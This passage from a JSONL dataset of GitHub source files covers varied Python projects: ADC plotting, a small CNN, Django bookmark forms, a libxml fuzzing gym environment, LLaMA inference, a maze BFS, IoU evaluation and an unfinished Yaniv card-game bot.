new_img2.save(\"shiru\"+str(i+30)+\".jpg\")\n \n new_img = img.rotate(315) \n new_img2 = img2.rotate(315) \n new_img.save(\"chenting\"+str(i+35)+\".jpg\")\n new_img2.save(\"shiru\"+str(i+35)+\".jpg\")\n print(i)\n'''","repo_name":"LINBOOyuan/YoloIma","sub_path":"Oimages/coverent.py","file_name":"coverent.py","file_ext":"py","file_size_in_byte":1790,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"16930083325","text":"\nimport serial\nimport matplotlib.pyplot as plt\nfrom matplotlib.animation import FuncAnimation\nfrom matplotlib import style\nfrom datetime import datetime\nfrom statistics import mean\n\nadc_data = []\ntime_data = []\n\nfor i in range(10):\n time_data.append(datetime.now())\n adc_data.append(2.5)\n\nstyle.use('fivethirtyeight')\n\nFig, ax = plt.subplots()\nax.set_xlim(0, 100)\nax.set_ylim(0, 100)\nline, = plt.plot([], [], 'ro')\n\n\ndef decompress(value):\n\n if value <= 15:\n return ((value & 0x80) << 4) | (value & 0x0f)\n elif value <= 31:\n return ((value & 0x80) << 4) | (1 << 4) | (value & 0x0f)\n elif value <= 47:\n return ((value & 0x80) << 4) | (1 << 5) | ((value & 0x0f) << 1) | 1\n elif value <= 63:\n return ((value & 0x80) << 4) | (1 << 6) | ((value & 0x0f) << 2) | 2\n elif value <= 79:\n return ((value & 0x80) << 4) | (1 << 7) | ((value & 0x0f) << 3) | 4\n elif value <= 95:\n return ((value & 0x80) << 4) | (1 << 8) | ((value & 0x0f) << 4) | 16\n elif value <= 111:\n return ((value & 0x80) << 4) | (1 << 9) | ((value & 0x0f) << 5) | 32\n else :\n return ((value & 0x80) << 4) | (1 << 10) | ((value & 0x0f) << 6) | 64\n\n\ndef adc():\n serial_port = serial.Serial(\"COM4\", 110)\n\n while True:\n adc_value_compressed = serial_port.read(1)\n adc_signal = 5 * decompress(int.from_bytes(adc_value_compressed, \"little\")) / 4095\n time = datetime.now()\n\n yield [adc_signal, time]\n\n\ndef animate(frame):\n\n adc_data.append(frame[0])\n time_data.append(frame[1])\n\n line.set_data(mean(adc_data[-9:-1]), time_data)\n\n ax.clear()\n ax.plot(time_data, adc_data)\n\n\nAni = FuncAnimation(Fig, func=animate, frames=adc(), interval=10)\nplt.show()\n\n\n\n\n\n\n","repo_name":"MohamedOssama96/ADC_Graph_Plotter","sub_path":"ADC_Plotting.py","file_name":"ADC_Plotting.py","file_ext":"py","file_size_in_byte":1742,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"8546362074","text":"# -*- coding:utf-8 -*-\n#定义了前向传播的过程以及神经网络的参数\n\nimport tensorflow as tf \n\n#定义神经网络结果相关的参数\nINPUT_NODE = 16\nOUTPUT_NODE = 4\n\ndef weight_variable(name, shape, regularizer):\n\tweights = tf.get_variable(\n\t\tname, shape,\n\t\tinitializer=tf.truncated_normal_initializer(stddev=0.1))\n\n\tif regularizer != None:\n\t\ttf.add_to_collection(\"losses\",regularizer(weights))\n\treturn weights \n\ndef bias_variable(shape):\n\tinitial = tf.constant(0.1, shape=shape)\n\treturn tf.Variable(initial)\n\ndef conv2d(x, W):\n\treturn tf.nn.conv2d(x, W, strides=[1,1,1,1], padding='SAME')\n\ndef max_pool_2x2(x):\n\treturn tf.nn.max_pool(x, ksize=[1, 2, 2, 1], strides=[1, 2, 2, 1], padding='SAME')\n\t\ndef inference(input_tensor, regularizer, keep_prob): \n\tx = tf.reshape(input_tensor, [-1, 4, 4, 1])\n\n\tW_conv1 = weight_variable(\"W_conv1\",[1, 1, 1, 2], regularizer) # 卷积是在每个5*5的patch中算出32个特征,分别是patch大小,输入通道数目,输出通道数目\n\tb_conv1 = bias_variable([2]) \n \n\th_conv1 = tf.nn.relu(conv2d(x, W_conv1) + b_conv1) #第一个卷积层\n\t#h_pool1 = max_pool_2x2(h_conv1) #第一个池化层\n\n\tW_conv2 = weight_variable(\"W_conv2\",[1, 1, 2, 4], regularizer) \n\tb_conv2 = bias_variable([4]) \n \n\th_conv2 = tf.nn.relu(conv2d(h_conv1, W_conv2) + b_conv2) #第二个卷积层\n\t#h_pool2 = max_pool_2x2(h_conv2) #第二个池化层\n\n\tW_fc1 = weight_variable(\"W_fc1\",[4 * 4 * 4, 256], regularizer) \n\tb_fc1 = bias_variable([256]) \n \n\th_pool2_flat = tf.reshape(h_conv2, [-1, 4*4*4]) #reshape成向量\n\th_fc1 = tf.nn.relu(tf.matmul(h_pool2_flat, W_fc1) + b_fc1) #第一个全连接层\n\n\th_fc1_drop = tf.nn.dropout(h_fc1, keep_prob) #dropout层 \n \n\tW_fc2 = weight_variable(\"W_fc2\",[256, 4],regularizer) \n\tb_fc2 = bias_variable([4]) \n\ty_conv=tf.matmul(h_fc1_drop, W_fc2) + b_fc2 \n\t\n\treturn y_conv\n\n","repo_name":"mengyuan-lee/wcl_lsap","sub_path":"Hungalg_CNN/hung_inference.py","file_name":"hung_inference.py","file_ext":"py","file_size_in_byte":1917,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"73843505681","text":"# Untitled.py\n# Created by liqiang on 03/01/2018.\n\nfrom math import sqrt\n\ndef isPrime(x):\n if x < 2:\n return Fales\n for i in range(2, int(sqrt(x)+1)):\n if x%i ==0:\n return False\n return True\n \nn = int(input(''))\ncount = 0\nfor i in range(3,n,2):\n if isPrime(i) and isPrime(i+2):\n count +=1\nprint(count)\n","repo_name":"liqiangvip/PAT-Python3","sub_path":"basic-level/1007.py","file_name":"1007.py","file_ext":"py","file_size_in_byte":349,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"10379419366","text":"from django import forms\nimport models\nfrom django.contrib.auth.models import User\nfrom ajax_select.fields import AutoCompleteSelectMultipleField, AutoCompleteSelectField\nfrom django.core.urlresolvers import reverse\nfrom django.template.defaultfilters import slugify\n\nclass AddBookmark(forms.ModelForm):\n authors = AutoCompleteSelectMultipleField('author', required=False)\n licences = AutoCompleteSelectMultipleField('license', required=False)\n class Meta:\n model = models.Bookmark\n fields = ('title', 'url', 'description', 'keywords', 'authors', 'licences')\n\n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop('request', None)\n super(AddBookmark, self).__init__(*args, **kwargs)\n \n # add link\n self.fields['authors'].widget.add_link = reverse('bookmarks.views.add_author')\n\n def clean(self):\n cleaned_data = self.cleaned_data\n user = self.request.user\n title = cleaned_data.get(\"title\")\n slug = slugify(title)\n \n if self.instance:\n bookmarks = models.Bookmark.objects.filter(user=user,slug=slug).exclude(id=self.instance.id)\n else:\n bookmarks = models.Bookmark.objects.filter(user=user,slug=slug)\n \n if bookmarks:\n raise forms.ValidationError(\"Your have already used this title, please choose again.\")\n ## slug should not be returned in cleaned_data, create in model save() so it works for API \n \n return cleaned_data\n \nclass EditBookmark(forms.ModelForm):\n authors = AutoCompleteSelectMultipleField('author', required=False)\n licences = AutoCompleteSelectMultipleField('license', required=False)\n\n class Meta:\n model = models.Bookmark\n fields = ('title', 'url', 'description', 'keywords', 'authors', 'licences')\n \n def __init__(self, *args, **kwargs):\n self.request = kwargs.pop('request', None)\n super(EditBookmark, self).__init__(*args, **kwargs)\n \n self.fields['authors'].initial = [a.id for a in self.instance.authors.all()]\n self.fields['licences'].initial = self.instance.licences.all()\n\n # add link\n self.fields['authors'].widget.add_link = reverse('bookmarks.views.add_author')\n\n\nclass AddPlaylist(forms.ModelForm):\n class Meta:\n model = models.Playlist\n fields = ('title', 'bookmarks',)\n\n def __init__(self, *args, **kwargs): \n self.request = kwargs.pop('request', None) \n super(AddPlaylist, self).__init__(*args, **kwargs) \n \n self.fields[\"bookmarks\"] = AutoCompleteSelectMultipleField('bookmarks', required=False)\n self.fields[\"bookmarks\"].help_text = 'Start typing the name or URL of the bookmark you wish to add, a list will be displayed for you to select from.' \n\n \n def clean(self):\n cleaned_data = self.cleaned_data\n \n user = self.request.user\n title = cleaned_data.get(\"title\")\n slug = slugify(title)\n if self.instance:\n playlists = models.Playlist.objects.filter(user=user,slug=slug).exclude(id=self.instance.id)\n else:\n playlists = models.Playlist.objects.filter(user=user,slug=slug)\n \n if playlists:\n raise forms.ValidationError(\"Your have already used this title, please choose again.\")\n \n return cleaned_data\n\n\nclass EditPlaylist(forms.ModelForm):\n class Meta:\n model = models.Playlist\n fields = ('title', 'bookmarks', 'editors')\n \n def __init__(self, *args, **kwargs): \n self.request = kwargs.pop('request', None) \n super(EditPlaylist, self).__init__(*args, **kwargs) \n self.fields[\"bookmarks\"] = AutoCompleteSelectMultipleField('bookmarks', required=False)\n self.fields[\"bookmarks\"].help_text = 'Start typing the name or URL of the bookmark you wish to add, a list will be displayed for you to select from.' \n \n self.fields[\"editors\"] = AutoCompleteSelectMultipleField('non_staff_users', required=False)\n self.fields[\"editors\"].help_text = 'Start typing the usenrame editor you wish to add, a list will be displayed for you to select from.'\n\n # if not owner remove editor input\n if self.request.user.id != self.instance.user.id:\n del self.fields['editors']\n \nclass AddAuthor(forms.ModelForm):\n class Meta:\n model = models.Author\n\n\nclass AddVote(forms.ModelForm):\n \"\"\" Only for API \"\"\"\n class Meta:\n model = models.Vote\n fields = ('value','content_type', 'object_id')\n\n def __init__(self, *args, **kwargs): \n self.request = kwargs.pop('request', None) \n super(AddVote, self).__init__(*args, **kwargs)\n \n def clean(self):\n cleaned_data = self.cleaned_data\n user = self.request.user\n value = cleaned_data.get(\"value\")\n object_id = cleaned_data.get(\"object_id\")\n content_type = cleaned_data.get(\"content_type\")\n \n if self.instance: \n votes = models.Vote.objects.filter(user=user,object_id=object_id,content_type__id=content_type.id).exclude(id=self.instance.id)\n else:\n votes = models.Vote.objects.filter(user=user,object_id=object_id,content_type__id=content_type.id)\n \n if votes:\n raise forms.ValidationError(\"You have already voted on this item, please delete your vote and post again.\")\n \n if value not in [-1, 1]:\n raise forms.ValidationError(\"Vote value must either be 1 or -1.\")\n \n return cleaned_data\n\n ","repo_name":"favOERites/favOERites","sub_path":"bookmarks/forms.py","file_name":"forms.py","file_ext":"py","file_size_in_byte":5631,"program_lang":"python","lang":"en","doc_type":"code","stars":3,"dataset":"github-code","pt":"3"} +{"seq_id":"47821983978","text":"import gymfuzz\nimport gymfuzz.coverage as coverage\n\nfrom gymfuzz.envs.fuzz_base_env import FuzzBaseEnv\n\n\nclass FuzzLibXMLEnv(FuzzBaseEnv):\n def __init__(self):\n self._input_size = 1024\n self._target_path = gymfuzz.libxml_target_path()\n self._args = []\n self._dict = coverage.Dictionary({\n 'tokens': [],\n 'bytes': True,\n })\n super(FuzzLibXMLEnv, self).__init__()","repo_name":"kynehc/gymfuzz","sub_path":"gymfuzz/envs/fuzz_libxml_env.py","file_name":"fuzz_libxml_env.py","file_ext":"py","file_size_in_byte":428,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"32204963182","text":"class Solution:\n def findSubsequences(self, nums: List[int]) -> List[List[int]]:\n n = len(nums)\n \n result = set()\n current = []\n \n def backtrack(index):\n if index == n:\n if len(current) >= 2:\n result.add(tuple(current))\n return\n if not current or current[-1] <= nums[index]:\n current.append(nums[index])\n backtrack(index + 1)\n current.pop()\n \n backtrack(index + 1)\n \n backtrack(0)\n \n return result\n \n ","repo_name":"ak1909552/leetcode-submissions","sub_path":"0491-non-decreasing-subsequences/0491-non-decreasing-subsequences.py","file_name":"0491-non-decreasing-subsequences.py","file_ext":"py","file_size_in_byte":638,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"29173443387","text":"from walle.authorization import iam\n\n\nPROJECT_FOLDER_ID = \"some-project-folder-id\"\nAUTOMATION_PLOT_FOLDER_ID = \"some-ap-folder-id\"\n\nMOCKED_USER_ID = \"mocked_user_id\"\nMOCKED_SA_ID = \"mocked_sa_id\"\nMOCKED_USER_LOGIN = \"mocked_user_login@\"\nMOCKED_SA_NAME = \"mocked_sa_name\"\nMOCKED_IAM_TOKEN = \"mocked_iam_token\"\nIAM_TOKEN_HEADERS = {\n \"Authorization\": f\"{iam.BEARER_HEADER_PREFIX}{MOCKED_IAM_TOKEN}\",\n}\n\n\ndef get_calls_args(actual_calls):\n return {\n (c.kwargs[\"permission\"], c.kwargs[\"resource_path\"].id, c.kwargs[\"resource_path\"].type) for c in actual_calls\n }\n","repo_name":"Alexander-Berg/2022-tests-examples","sub_path":"infra/tests/api/iam_permissions/mocks.py","file_name":"mocks.py","file_ext":"py","file_size_in_byte":575,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"18446947261","text":"#a python script for inference on a single example using LlAMA model\nimport argparse\nfrom transformers import LlamaForCausalLM, LlamaTokenizer, AutoModelForCausalLM, AutoTokenizer\nimport torch\n\nB_INST, E_INST = \"[INST]\", \"[/INST]\"\nB_SYS, E_SYS = \"<<SYS>>\\n\", \"\\n<</SYS>>\\n\\n\"\nBOS, EOS = \"<s>\", \"</s>\"\n\nassistant_prompt = \"\"\n\n\nllama_prompt = f\"{BOS}{B_INST} {B_SYS}\\n\" \\\n f\"{assistant_prompt}\\n\" \\\n f\"{E_SYS}\\n\\n\" \\\n \"{input}\" \\\n f\"{E_INST} Response:\"\n\ndef run_inference(input_sentence, tokenizer, model, device):\n # get output of the LlaMa from input sentence\n\n input_sentence = llama_prompt.format(input=input_sentence)\n\n input_ids = tokenizer.encode(input_sentence, return_tensors=\"pt\").to(device)\n attention_mask = torch.ones(input_ids.shape, dtype=torch.long, device=device)\n output_ids = model.generate(\n inputs=input_ids,\n attention_mask=attention_mask,\n temperature=0.7,\n top_p=0.9,\n do_sample=True,\n num_beams=1,\n max_new_tokens=600,\n eos_token_id=tokenizer.eos_token_id,\n pad_token_id=tokenizer.pad_token_id,\n )\n output_sentence = tokenizer.decode(output_ids[0], skip_special_tokens=True)\n output_sentence = output_sentence.split(\"Response:\")[1]\n print(output_sentence)\n return output_sentence\n\ndef load_model(model_path):\n device = \"cuda:0\" if torch.cuda.is_available() else \"cpu\"\n print(f'Load model using Device \"{device}\" from path \"{model_path}\".')\n\n tokenizer = LlamaTokenizer.from_pretrained(model_path)\n model = LlamaForCausalLM.from_pretrained(model_path).to(device)\n\n\n return tokenizer, model, device\n\nif __name__ == \"__main__\":\n parser = argparse.ArgumentParser()\n parser.add_argument(\"--input_model\", type=str, required=True)\n arg = parser.parse_args()\n tokenizer, model, device = load_model(arg.input_model)\n\n print(\"Enter a sentence to generate your response. Enter 'exit' to exit.\")\n previouses = []\n while True:\n input_sentence = input(\"Enter a sentence: \")\n if input_sentence == \"exit\":\n break\n run_inference(input_sentence, tokenizer, model, device)\n\n\n\n\n\n\n","repo_name":"chatnoir-eu/chatnoir-chat","sub_path":"llms/llama-2-models/run_inference.py","file_name":"run_inference.py","file_ext":"py","file_size_in_byte":2205,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"3"} +{"seq_id":"30514852162","text":"from typing import Optional\n\nimport mmengine.dist as dist\nimport rich.progress as progress\nfrom rich.live import Live\n\ndisable_progress_bar = False\nglobal_progress = progress.Progress(\n '{task.description}',\n progress.BarColumn(),\n progress.TaskProgressColumn(show_speed=True),\n progress.TimeRemainingColumn(),\n)\nglobal_live = Live(global_progress, refresh_per_second=10)\n\n\ndef track(sequence, description: str = '', total: Optional[float] = None):\n if disable_progress_bar:\n yield from sequence\n else:\n global_live.start()\n task_id = global_progress.add_task(description, total=total)\n task = global_progress._tasks[task_id]\n try:\n yield from global_progress.track(sequence, task_id=task_id)\n finally:\n if task.total is None:\n global_progress.update(task_id, total=task.completed)\n if all(task.finished for task in global_progress.tasks):\n global_live.stop()\n for task_id in global_progress.task_ids:\n global_progress.remove_task(task_id)\n\n\ndef track_on_main_process(sequence, description='', total=None):\n if not dist.is_main_process() or disable_progress_bar:\n yield from sequence\n else:\n yield from track(sequence, total=total, description=description)\n","repo_name":"open-mmlab/mmaction2","sub_path":"mmaction/utils/progress.py","file_name":"progress.py","file_ext":"py","file_size_in_byte":1334,"program_lang":"python","lang":"en","doc_type":"code","stars":3560,"dataset":"github-code","pt":"3"} +{"seq_id":"71019246801","text":"#! /usr/bin/env python3\n\nfrom transl import LookupTable\n\nclass Env():\n def __init__(self, binding_list = []):\n self.bindings = dict()\n self.next_id = 0\n for elem in binding_list:\n self.bind(elem)\n\n def bind(self, elem) -> int:\n if elem in self.bindings:\n return self.bindings[elem]\n else:\n self.bindings[elem] = self.next_id\n self.next_id += 1\n return self.next_id-1\n\n def __contains__(self, item):\n return item in self.bindings\n\n def __str__(self) -> str:\n ret_list = [\"{} -> {}\".format(key, self.bind(key))\\\n for key in sorted(self.bindings.keys())]\n return \"\\n\".join(ret_list)\n \n \nif __name__ == '__main__':\n e = Env([\"R0\", \"R1\", \"R2\"])\n print(e)\n print(e.bind(\"R0\"))\n print(e.bind(\"R0\"))\n print(e.bind(\"Rvar\"))\n print(e)\n","repo_name":"gcali/drisc","sub_path":"env.py","file_name":"env.py","file_ext":"py","file_size_in_byte":899,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5081865253","text":"import sys\nfrom collections import deque\n\nN, M = map(int, sys.stdin.readline().split())\n\nmaze = [list(map(int, list(sys.stdin.readline().strip()))) for _ in range(N)]\n\ndx = [1, -1, 0, 0]\ndy = [0, 0, 1, -1]\n\n\ndef bfs(y, x):\n queue = deque()\n queue.append((y, x))\n while queue:\n y, x = queue.popleft()\n for i in range(4):\n nx = x + dx[i]\n ny = y + dy[i]\n if 0 <= nx <= M-1 and 0 <= ny <= N-1:\n if maze[ny][nx] == 0:\n continue\n if maze[ny][nx] == 1:\n queue.append((ny, nx))\n maze[ny][nx] = maze[y][x] + 1\n return maze[N-1][M-1]\n\n\nprint(bfs(0, 0))\n","repo_name":"huckjoo/swjungle_alg","sub_path":"week03/2178_re.py","file_name":"2178_re.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"14860410771","text":"import torch\nimport torch.nn as nn\nimport torch.nn.functional as F\n\nclass SingleMatrix(nn.Module):\n def __int__(self):\n super().__init__()\n\n def forward(self, x):\n self.fcl = nn.Linear(3000, 128*30)\n x = self.fcl(x)\n # batch_size = 10\n # number of attention heads = 30\n # sequence len = 1\n # dimention of particular sequence = 128\n x = x.reshape(10, 30, 1, 128)\n return x\n\nclass QKVMatrix(nn.Module):\n def __init__(self):\n super().__init__()\n self.QMatrix = SingleMatrix()\n self.KMatrix = SingleMatrix()\n self.VMatrix = SingleMatrix()\n\n def forward(self, x):\n q = self.QMatrix(x)\n k = self.KMatrix(x)\n v = self.VMatrix(x)\n return q,k,v","repo_name":"Arshdeep-Singh-01/Human-Activity-Recognition-using-MutliHead-Convolutional-Attention","sub_path":"layers/Attention/QKVmatrix.py","file_name":"QKVmatrix.py","file_ext":"py","file_size_in_byte":690,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"12342137595","text":"'''\nScript to read information from airly and post it in Domoticz\n'''\nimport configparser\nimport domoticz\nimport airly\n\ndef main():\n '''main function'''\n config = configparser.ConfigParser()\n config.sections()\n config.read('config.ini')\n dom = domoticz.Domoticz(config[\"Domoticz\"][\"Host\"], config[\"Domoticz\"][\"Username\"], config[\"Domoticz\"][\"Password\"])\n air = airly.Airly(config[\"Airly\"][\"Host\"], config[\"Airly\"][\"APIKey\"], config[\"Airly\"][\"Installation\"])\n if air.update() == 200:\n if air.temp:\n dom.set_sensor_thb(config[\"idx\"][\"airly_thb\"], air.temp, air.hum, air.baro)\n\n if air.pm1:\n dom.set_sensor_custom(config[\"idx\"][\"airly_pm1\"], air.pm1)\n\n if air.pm10:\n dom.set_sensor_custom(config[\"idx\"][\"airly_pm10\"], air.pm10)\n\n if air.pm25:\n dom.set_sensor_custom(config[\"idx\"][\"airly_pm25\"], air.pm25)\n\n if air.caqi:\n dom.set_sensor_custom(config[\"idx\"][\"airly_caqi\"], air.caqi)\n\nif __name__ == \"__main__\":\n main()\n","repo_name":"richarddeweerd/automation_tools","sub_path":"update_airly.py","file_name":"update_airly.py","file_ext":"py","file_size_in_byte":1029,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"5746306101","text":"\"\"\"Calculate mean IoU.\n\nThis script was used to calculate the object wise mean IoU \ngiven the pickled output files from evaluate dataset. \nThe paths to the pickle files are specified down in the main\n\nExample:\n $ python iou_compare_resuslts.py\n\"\"\"\n\nimport pickle\nimport json\nfrom PIL import Image, ImageColor\nimport numpy as np\n\ndef avg_track_length(st1, st2):\n track_length_st1= []\n track_length_st2= []\n for scene in st1: \n for obj in st1[scene]:\n track_length_st1.append(st1[scene][obj])\n track_length_st2.append(st2[scene][obj])\n return sum(track_length_st1)/len(track_length_st1), sum(track_length_st2)/len(track_length_st2)\n\ndef compare_iou(iou_dict1, iou_dict2, lookup):\n for obj in iou_dict1:\n if iou_dict1[obj][0] != 0 and iou_dict2[obj][0] != 0:\n print(obj, \": GOLD: \", iou_dict1[obj][1]/iou_dict1[obj][0], \" PRED: \", iou_dict2[obj][1]/iou_dict2[obj][0])\n else: \n print(obj, \" seen \", 0, \" times with mean IoU: \", 0)\n\ndef main():\n mode = \"ssim\"\n #thrs= [0.05,0.1,0.15,0.2,0.25,0.30,0.35,0.4,0.45,0.5,0.55,0.6,0.65,0.7,0.75,0.8,0.85,0.9,0.95,0.98]\n thrs = [0.25]\n mode = 'confidence_score'\n dataset = 'a2d2'\n if dataset == 'a2d2':\n instance_dict = {\n \"cars\": 1,\n \"pedestrians\": 2,\n \"trucks\": 3,\n \"smallVehicle\": 4,\n \"utilityVehicle\": 5,\n \"bicycle\": 6,\n \"tractor\": 7\n }\n else: \n instance_dict = {'cars': 1,\n 'pedestrian': 2}\n inverted_instance_dict = {val:key for key, val in instance_dict.items()}\n object_wise_iou = {obj: [] for obj in instance_dict}\n total_iou = []\n number_of_instances = {obj: [] for obj in instance_dict}\n number_of_instances['total'] = []\n\n experiment_string6 = dataset+'42ssim0.8_gold_iou_dict.pickle'\n experiment_string7 = dataset+'8ssim0.8_gold_iou_dict.pickle'\n experiment_string8 = dataset+'69ssim0.8_gold_iou_dict.pickle'\n #experiment_string5 = dataset+'42ssim0.8_gold_iou_dict.pickle'\n #experiment_string6 = dataset+'8confidence_score0.75_gold_iou_dict.pickle'\n #experiment_string7 = dataset+'42confidence_score0.75_gold_iou_dict.pickle'\n #experiment_string8 = dataset+'69confidence_score0.75_gold_iou_dict.pickle'\n experiment_strings = [experiment_string6, experiment_string7, experiment_string8]\n for experiment_string in experiment_strings: \n iou_dict = pickle.load(open(dataset+\"_pickle_files/\"+experiment_string, 'rb'))\n for scene in iou_dict:\n for entry_point in iou_dict[scene]:\n for obj in iou_dict[scene][entry_point]:\n if obj != 0:\n total_iou.append(iou_dict[scene][entry_point][obj][0][0])\n obj_string = inverted_instance_dict[int(str(obj)[0])]\n object_wise_iou[obj_string].append(iou_dict[scene][entry_point][obj][0][0])\n \n for obj in object_wise_iou:\n number_of_instances[obj].append(len(object_wise_iou[obj]))\n number_of_instances['total'].append(len(total_iou))\n \n for obj in object_wise_iou:\n print(obj, ':')\n if object_wise_iou[obj] != []:\n print(np.mean(np.array(number_of_instances[obj])), np.std(np.array(number_of_instances[obj])),np.mean(np.array(object_wise_iou[obj])), np.std(np.array(object_wise_iou[obj])))\n else: \n print(0,0,0)\n print('Total:')\n print(np.mean(np.array(number_of_instances['total'])), np.std(np.array(number_of_instances['total'])), np.mean(np.array(total_iou)), np.std(np.array(total_iou)))\n \nif __name__ == \"__main__\":\n main()\n","repo_name":"samuki/single-object-tracking","sub_path":"evaluation/iou_compare_results.py","file_name":"iou_compare_results.py","file_ext":"py","file_size_in_byte":3682,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"3"} +{"seq_id":"20826774116","text":"import copy\n\nclass Player:\n def __init__(self, name) -> None:\n self.name = name\n self.hand = []\n self.current_score = 0\n self.totle_score = 0\n self.is_ready = False\ndef simulate(player_hand:list):\n decision = {'cards_to_throw' : [],\n 'pile_or_deck' : \"\",\n 'yaniv' : False\n }\n sum_cards = 0\n for card in player_hand:\n card_prop = str(card).split('_') \n sum_cards += int(card_prop[0])\n if sum_cards <= 7:\n decision['yaniv'] = True\n return decision \n player_hand.sort()\n #check fo pairs\n pair = check_for_pairs(player_hand)\n #check for straight\n straight = check_for_straghit(player_hand)\n if len(straight) > 2:\n straight.sort()\n sort_straghit(straight)\n print(player_hand)\n completing_card_for_straghit = \"\"# a card that can complite a straghit and is draweble\n completing_card_for_pair = \"\"# a card that can complite a pair and is draweble\n missing_cards_for_straghit = [] #cards that can replace a joker in a strghit\n if len(straight) != 0 and len(pair) != 0:\n \n missing_cards_for_straghit = find_missing_cards_for_straghit(straight)\n \n if last_cards_thrown[0] in missing_cards_for_straghit:\n completing_card_for_straghit = copy.copy(last_cards_thrown[0])\n elif last_cards_thrown[-1] in missing_cards_for_straghit:\n completing_card_for_straghit = copy.copy(last_cards_thrown[-1])\n for card in player_hand:\n if card[:2] == last_cards_thrown[0][:2]:\n completing_card_for_pair = last_cards_thrown[0]\n if card[:2] == last_cards_thrown[-1][:2]:\n completing_card_for_pair = last_cards_thrown[-1]\n \n if get_sum(pair) > 6 and completing_card_for_straghit != \"\":\n print(\"in case get_sum(pair) > 6 and completing_card_for_straghit != \"\"\")\n\n decision['cards_to_throw'] = pair\n decision['pile_or_deck'] = completing_card_for_straghit\n elif get_sum(straight) > 6 and completing_card_for_pair != \"\":\n decision['cards_to_throw'] = straight\n decision['pile_or_deck'] = completing_card_for_pair\n elif get_sum(straight) < get_sum(pair):\n decision['cards_to_throw'] = pair\n copy_hand = [card for card in player_hand if not card in pair]\n copy_hand.append(last_cards_thrown[0])\n copy_hand.sort()\n opt1 = get_sum(check_for_pairs(copy_hand))\n copy_hand.remove(last_cards_thrown[0])\n copy_hand.append(last_cards_thrown[-1])\n copy_hand.sort\n opt2 = get_sum(check_for_pairs(copy_hand))\n if opt1 > opt2:\n decision['pile_or_deck'] = last_cards_thrown[0]\n elif opt1 < opt2:\n decision['pile_or_deck'] = last_cards_thrown[-1]\n elif opt2 == 0:\n decision['pile_or_deck'] = 'deck'\n else:\n decision['pile_or_deck'] = last_cards_thrown[0]\n\n elif get_sum(straight) > get_sum(pair):\n print(\"in case get_sum(straight) > get_sum(pair)\")\n\n decision['cards_to_throw'] = straight\n copy_hand = [card for card in player_hand if not card in straight]\n copy_hand.append(last_cards_thrown[0])\n copy_hand.sort()\n opt1 = get_sum(check_for_pairs(copy_hand))\n copy_hand.remove(last_cards_thrown[0])\n copy_hand.append(last_cards_thrown[-1])\n copy_hand.sort\n opt2 = get_sum(check_for_pairs(copy_hand))\n if opt1 > opt2:\n decision['pile_or_deck'] = last_cards_thrown[0]\n elif opt1 < opt2:\n decision['pile_or_deck'] = last_cards_thrown[-1]\n elif opt2 == 0:\n decision['pile_or_deck'] = 'deck'\n else:\n decision['pile_or_deck'] = last_cards_thrown[0]\n \n elif len(straight) == 0 and get_sum(pair) > 0:\n print(\"in case len(straight) == 0 and get_sum(pair) > 4\")\n decision['cards_to_throw'] = pair\n if int(last_cards_thrown[0][:2]) > 5:\n decision['pile_or_deck'] = last_cards_thrown[0] \n elif int(last_cards_thrown[-1][:2]) > 5:\n decision['pile_or_deck'] = last_cards_thrown[-1] \n else:\n decision['pile_or_deck'] = 'deck'\n elif get_sum(pair) == 0 and get_sum(straight) == 0:\n print(\"in case no pair no straghit\")\n player_hand_copy = copy.copy(player_hand)\n player_hand_copy.append(last_cards_thrown[0])\n player_hand_copy.sort()\n opt_for_pair1 = check_for_pairs(player_hand_copy)\n opt_for_str1 = check_for_straghit(player_hand_copy)\n \n player_hand_copy.remove(last_cards_thrown[0])\n options = [opt_for_pair1, opt_for_str1]\n if len(last_cards_thrown) > 1:\n player_hand_copy.append(last_cards_thrown[-1])\n player_hand_copy.sort()\n \n opt_for_pair2 = check_for_pairs(player_hand_copy)\n opt_for_str2 = check_for_straghit(player_hand_copy)\n player_hand_copy.remove(last_cards_thrown[-1])\n options.append( opt_for_pair2)\n options.append( opt_for_str2)\n final_opt = options[0]\n max_sum = 0\n for opt in options:\n x = get_sum(opt)\n if x > max_sum:\n max_sum = x\n final_opt = opt\n if max_sum == 0:\n decision['cards_to_throw'] = [player_hand[-1]]\n if int(last_cards_thrown[0][:2]) < 2:\n decision['pile_or_deck'] = last_cards_thrown[0]\n else:\n decision['pile_or_deck'] = \"deck\"\n else:\n for card in player_hand_copy:\n if card in final_opt:\n final_opt.remove(card)\n else:\n decision['cards_to_throw'] = [card]\n \n \n decision['pile_or_deck'] = final_opt.pop()\n \n return decision\n\n\n\ndef get_sum(cards_set):\n cards_sum = 0\n for card in cards_set:\n cards_sum += int(card[:2])\n return cards_sum\n\ndef check_for_straghit(player_hand):\n straight = set()\n current_straghit = set()\n joker_red = 0\n joker_black = 0\n if \"00_red_joker\" in player_hand:\n joker_red += 1\n if \"00_black_joker\" in player_hand:\n joker_black += 1\n start_index = joker_red + joker_black\n for i in range(start_index, len(player_hand)-1):\n card_i_prop = str(player_hand[i]).split('_') \n for j in range(i+1, len(player_hand)):\n card_j_prop = str(player_hand[j]).split('_')\n if int(card_i_prop[0]) == int(card_j_prop[0])-1 and card_i_prop[2] == card_j_prop[2]:\n current_straghit.add('_'.join(card_i_prop))\n 